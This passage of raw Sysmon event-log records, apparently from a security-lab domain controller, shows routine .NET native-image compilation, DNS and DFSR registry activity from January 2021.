19\mscorsvc.dll+9082(wow64) 11241100x80000000000000007574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:42.099{08A6967A-4618-6000-6C03-000000009A01}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b34-0\System.Runtime.Serialization.dll2021-01-14 13:24:42.099 22542200x80000000000000007581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:43.975{08A6967A-4286-6000-0B00-000000009A01}852win-dc-250.attackrange.local0fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000007585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:53.959{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4625-6000-6F03-000000009A01}4004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:53.943{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4625-6000-6F03-000000009A01}4004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:53.943{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4625-6000-6F03-000000009A01}4004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:53.412{08A6967A-461A-6000-6E03-000000009A01}3148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c4c-0\System.ServiceModel.dll2021-01-14 13:24:53.412 10341000x80000000000000007588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:54.365{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4626-6000-7003-000000009A01}1152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:54.350{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4626-6000-7003-000000009A01}1152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:54.350{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4626-6000-7003-000000009A01}1152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 13241300x80000000000000007591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:24:59.944{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\E353614F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_E353614F-0000-0000-0000-100000000000.XML 13241300x80000000000000007590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:24:59.928{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Config SourceDWORD (0x00000001) 13241300x80000000000000007589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:24:59.928{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_2F6F85D1-BD71-4F32-93CC-49B3DCE2851F.XML 10341000x80000000000000007595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:01.366{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-462D-6000-7103-000000009A01}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:01.350{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-462D-6000-7103-000000009A01}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:01.350{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-462D-6000-7103-000000009A01}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:01.022{08A6967A-4626-6000-7003-000000009A01}1152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\480-0\PresentationCore.dll2021-01-14 13:25:01.022 10341000x80000000000000007598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:02.116{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-462E-6000-7203-000000009A01}4496C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:02.100{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-462E-6000-7203-000000009A01}4496C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:02.100{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-462E-6000-7203-000000009A01}4496C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:12.960{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4638-6000-7403-000000009A01}3344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:12.945{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4638-6000-7403-000000009A01}3344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:12.945{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4638-6000-7403-000000009A01}3344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:12.851{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4638-6000-7303-000000009A01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:12.835{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4638-6000-7303-000000009A01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:12.835{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4638-6000-7303-000000009A01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:12.288{08A6967A-462E-6000-7203-000000009A01}4496C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1190-0\PresentationFramework.dll2021-01-14 13:25:12.288 10341000x80000000000000007609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:13.382{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4639-6000-7503-000000009A01}4184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:13.367{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4639-6000-7503-000000009A01}4184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:13.367{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4639-6000-7503-000000009A01}4184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 